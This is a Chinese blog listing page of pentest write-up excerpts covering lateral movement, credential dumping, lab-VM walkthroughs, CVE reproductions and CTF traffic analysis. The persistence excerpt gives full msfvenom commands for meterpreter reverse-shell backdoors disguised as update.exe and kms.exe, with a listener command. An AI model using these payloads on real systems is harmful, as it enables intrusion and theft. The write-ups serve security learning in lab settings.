- 博客(22)
- 收藏
- 关注
RSS订阅原创 内网安全:IPC横向
IPC是为了实现进程之间的通信而开放的管道。IPC可以通过验证用户名和密码来获取相应的权限。通过IPC可以与目标机器建立连接。
2024-07-23 15:42:50
426
原创 内网安全:各类密码的抓取
sam文件和lsass进程就是Windows存储本地密码的文件和进程,我们可以通过读取sam文件和lsass进程,可以获得本地的用户密码,从而进行内网横向。
2024-07-21 21:28:13
1431
1
原创 Windows认证LM Hash和NTLM Hash以及认证协议
Windows密码一般放在:c://windows/system/config/SAM我们在winlogon.exe输入密码时,会发送到lsass.exe 去转化为NTLM Hash与SAM文件中的值去对比 ,如果相同,将user id 与group id 发送给winlogon.exe 准备桌面,登录成功。不同则失败LM Hash和NTLM Hash:Windows中的密码一般由两部分组成,一部分是LM哈希和NTLM哈希Hash 结构:username:RID:LM‐HASH:NT‐HASH。
2024-07-19 16:45:52
856
原创 内网安全:权限维持的各种姿势
监听:msfconsole -x "use exploit/multi/handler;MSF后门和监听:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.128 LPORT=9997 -f exe -o update.exe。MSF后门:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.128 LPORT=9999 -f exe -o kms.exe。
2024-07-12 20:05:47
1920
原创 内网安全:域内信息探测
四种情况:1.本地用户:user2.本地管理员用户:家庭版禁用,server才有3.域内用户4.域内管理员本地普通用户不能获取域内信息本地管理员用户,可以直接提权为system用户(域内用户),可以获取域内信息一.判断域是否存在:1.查看域:ipconfig/all 或 systeminfo 或net config workstation。
2024-07-11 17:17:10
1263
原创 内网信息收集:手动、脚本和工具查IP、端口
以下命令在CS执行时命令前须加shell,如:shell ipconfig1.收集IP网卡: ipconfig2.收集操作系统和软件信息: systeminfo3.查看操作系统的体系结构:echo %PROCESSOR_ARCHITECTURE%4.查看目录和文件夹:shell dir shell type 文件名5.查看操作系统的软件及版本信息:6.本机的服务信息: wmic service list brief。
2024-07-08 23:58:32
1014
原创 CobaltStrike的内网安全
介绍:CobaltStrike分为服务端和客户端,一般我们将服务端放在kali,客户端可以在物理机上面,或者虚拟机都可以启动服务端,首先创建一个监听(注意,这里要关闭kali的Apache服务,要不然端口占用创建监听不成功)payload选择Beacon HTTP ,HTTP Hosts选择服务器的IP点击save接着我们用CS生成一个payload(Windows exe),使得我靶机上线:Lisrener选择我们创建的监听服务,点击Launch。
2024-07-05 18:54:49
1304
原创 客户端渗透
介绍:我们要进行客户端渗透,我们生成一个可执行程序,也是简单粗暴,MSF建立监听,把它发给受害者,只要受害者点击,监听机监听的机器直接上线(现在这种方法一般不会成功,杀毒软件会直接杀掉,这个程序可以经过几种语言编码,降低杀毒软件的防范可能直接免杀,虽然不能实际直接使用,但可以让我们了解和预防这类的攻击,本质上是一样的) 生成一个带有反弹连接的EXE程序:开启Apache服务使能够下载:访问这个虚拟机IP及其对应的文件,下载放在靶机上面去,并且关闭杀毒软件,要不然会直接把程序清除MSF开启监听:我们点击我们下
2024-07-03 22:24:05
786
原创 一次DC9靶机的渗透测试
探测存活主机发现主机探测端口和服务:HTTP服务,浏览器打开看一下:一番查找发现SQL注入:回显:我们先看是什么请求:发现post请求,参数search,直接上SQLmap一把梭:先查看数据库:查看users的表名:直接查看数据:这个可能是CMS的登录账号密码,但不知道对应哪一个,做一个字典,直接上BP爆破我们随便填一个用户名密码填上字典,开始爆破结果返回:我将长度排列了一下,发现并没有特别的,说明这不是登录的账号密码,结合之前我们在SQL注入的时候还发现了一个staff,我们查看一下:查看Users:又发
2024-06-26 15:04:03
1116
3
原创 一次DC1靶机的渗透测试
原因:若是对一些特殊命令设置了SUID,那么就会有被提权的风险,常用的SUID提权命令有nmap、vim、find、bash、more、less、nano、awk和cp等。让我们提权,得到root用户,那么返回我们的命令行,这里提权我们可以利用的是find。发现管理员用户和密码,但是不知道密码是什么,在这里,采用密码替换。因为这是一个Drupal的管理系统,那么我们搜索是否有这个漏洞。那么我们试一下是否有权限,我们新建一个文件,然后进行命令执行。正好发现了一个我们之前获得的数据库名,那么,我们切换数据库。
2024-06-23 23:32:47
954
原创 一次breach1靶机的渗透测试
首先进行主机发现,找到目标机器:找到目标机器,进行端口扫描:一共扫到996个开放的端口,正好里面有一个HTTP服务,我们在网页打开看一下:打开源码发现一个加密的东西,应该是MD5,解密得到:pgibbons:damnitfeel$goodtobeagang$ta这看起来像是一个账号和密码我们继续找一些有用的信息,又发现了一个CMS的管理后台我们对最初的目录进行目录扫描,看有没有什么遗漏的东西:dirb打开看一下:继续扫一下CMS:whatweb -v。
2024-06-22 14:54:36
873
原创 一次prime1靶机的渗透测试
什么也没有,说明我们找的参数不对,这里我们可以继续用FUZZ进行爆破参数,但是Linux里面,密码大多数存储在 /etc/passwd里面,我们试一下。查找对应的漏洞版本,后面有一个脚本,我们需要把它编译为我们需要利用的,然后传到目标靶机里面,然后执行,就可以提升到root权限。爆出信息,接下来我们进行提权获取root权限,因为爆出了操作系统,我们查看操作系统的漏洞,进入msfconsole。这里我们可以利用WordPress的漏洞,我们可以用漏扫工具扫一下,
2024-06-19 23:20:54
1199
原创 CVE SaltStack命令注入漏洞复现
组合这两个漏洞,将可以使未授权的攻击者通 过Salt API执行任意命令 影响范围 SaltStack < 3002.1 SaltStack < 3001.3 SaltStack < 3000.5 SaltStack < 2019.2.7。因为这里的&被过滤了,我们将&进行URL编码为%26 ,这里的456.sh 是我们创建的一个可执行文件。我们在下面添加一条数据,点击发送,这是一条在docker容器里面添加文件的命令。启动成功以后我们在浏览器输入启动的环境IP和端口,查看是否启动成功。
2024-06-16 18:01:13
672
原创 CVE Docker逃逸漏洞的复现
它允许开发者将他们的应用及其依赖包打包到一个可移植的镜像中,然后发布到任何流行的Linux或Windows操作系统的机器上,并且实现虚拟化。docker可以安装软件,也可以安装一个操作系统。需要在不同操作系统中引入一个中间层,中间层很多版本,可以在Windows、Linux、centos等等的不同操作系统之间引入一个中间层,可以用来屏蔽底层环境的差异。靶机:需要先运行一个拥有命令行的镜像比如 ubuntu:18.04 ,我们需要在进入镜像,在容器的命令行执行下载远程恶意文件,我们给他增加权限,然后执行。
2024-06-15 00:00:00
705
原创 CVE Struts2 s2-062 ONGL的漏洞复现
{}解析OGNL表达式,对用户输入 的内容进行二次解析的时候,如果没有验证, 可能导致远程代码执行,他会自动计算结果,并把结果自动赋值给Struts的标签的地方,我们可以再试一下,我们将6*6改为 9*9。然而,值得注意的是,Struts2在某些版本中存在远程代码执行漏洞,因此在使用Struts2进行开发时,需要确保使用最新的、已经修复漏洞的版本,并采取必要的安全措施来保护应用程序的安全性。项目使用了%{}解析OGNL表达式,对用户输入 的内容进行二次解析的时候,如果没有验证, 可能导致远程代码执行。
2024-06-14 00:00:00
765
原创 【终极版本】 kali扩充sda1磁盘空间
因为我的sda1也满了,我在网上翻了好几个资料,我都试了试,有一个清理磁盘命令我以为是清理不常用的东西和缓存,但是我执行之后直接把我虚拟机的可视化屏幕删了,我打不开虚拟机了,我直接老实了,不敢再随便试那些清理命令了,经过我几个小时的努力,终于把sda1扩充好了,写这篇文章给大家避避坑。这里面大多数是我们的缓存,根据自己的情况进行清理,也可以降低sda1的使用率。第一步,我们首先将linux-swap删除,删除之前要。重复上面的操作,建立我们的swap。这是我扩充好的,我们直接用这个命令查看。
2024-06-13 00:04:49
453
原创 CVE springrce远程代码执行漏洞的IDEA复现
后面就是我们的参数值,因为我们定义一个name的属性,那么我们就会自动找到user对象name的属性,并且赋值给它,为了验证。还支持子属性的赋值,因为有一个department的属性,通过.name,找到department的name的值,把sec的值赋值给它。可以减少我们各种各样的get,post,set、name的代码的写法,这种就叫参数自动绑定,给我们的编码带来便利。方法,拿到Department对象的setName()的方法,才把sec的值赋值。作用:对Spring容器中管理的对象,自动调用。
2024-06-12 00:59:37
1072
原创 Spring Cloud Gateway RCE漏洞的IDEA复现
我们首先了解一些基础知识spring cloud 微服务架构Spring Cloud微服务架构是一种基于Spring Framework的开源微服务架构解决方案。它将一个大型的单个应用程序和服务拆分为数个甚至数十个支持微服务的小应用,这些小应用可独立地进行开发、管理和迭代。Spring Cloud提供了一系列工具和框架,帮助开发者快速构建和部署微服务应用。其主要特点包括微服务支持、开放性和可扩展性、高可用性和容错性,以及基于云原生架构的部署能力。
2024-06-11 00:25:20
1212
原创 CVE Log4j2的远程代码执行漏洞的IDEA复现
攻击者构造一个恶意的class文件,然后上传到服务器上,开始监听,然后我们要客户端用构造的JNDI 去查找目标服务器的LDAP的数据,我们构造一个不存在的数据让他找,他找不到,然后会自动去执行我们传上去的地址去下载,下载完以后会自动执行。,它使用的最大优势就是可以将不同系统的数据集中在一起,从而避免了我们每次访问不同系统时都需要登录账号密码,使用LDAP,可以使我们只用登录一个账号和密码就可以找到我们需要的数据。在LDAP寻找不到我们查找的数据的时候,它就会自动执行我们传上去的恶意地址去下载,并且执行。
2024-06-09 12:59:42
939
原创 XCTF Wireshark
说明图片里面有隐藏信息要让我们解密,回到之前我们发现了两张图片,我们将两张图片分离出来,先将%5c(1)拖到010里面,因为这是一个png图片我们直接搜索89 50,把前面的内容都删了。回到之前我们打开的网址将图片放上去,因为有密码,那么我们要先找到密码,因为我们分离了两张图片,我猜测密码在第一个图片里面。我们打开一个HTTP流,发现里面东西还挺多,这是一个html代码,并且HTTP流的数据包挺少的,那么我们对他们依次进行VScode查看,发现%5c(1)和%5c(4)都是有png图片,
2024-05-28 23:40:33
411
原创 XCTF traffic
我们用flag的变形f1ag,fl4g,f14g搜索,还是没有搜到什么东西,到这里,这道题跟以往做过的不一样,那么我们观察流量包,发现里面有TLSv1.2 ,TCP,ICMP,DNS 等等协议,相比于之前我们做的题目,一般都是TCP,HTTP的流量包,那么我们从这几个不常见的流量包下手,先从TLSv1.2开始,我们不知道TLSv1.2是什么,可以百度一下,说是用于在网络通信中提供加密和身份验证的协议,那么我们打开一个TLSv1.2的追踪流。我们就试一下144,
2024-05-27 07:00:00
277
原创 XCTF之流量分析
1.我们先下载附件将其直接拖到wireshark中,这种题一般都是找flag,我们在搜索框中直接搜flag发现我们追踪流发现GET请求是盲注并且加密,那么我们进行URL解密,这里是解的两次密果然是盲注,那么我们返回请求包看它是否请求成功,因为这是HTTP协议,那么我们进行导出对象HTTP,通过查看大小,我们发现大部分都是492,之后发现一个518,这种大小不一样的,一般请求成功我们点一下发现它的长度是695,那么我们进行过滤695长度的HTTP流量包,http && frame.len ==695接着我们查
2024-05-26 17:49:17
472
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人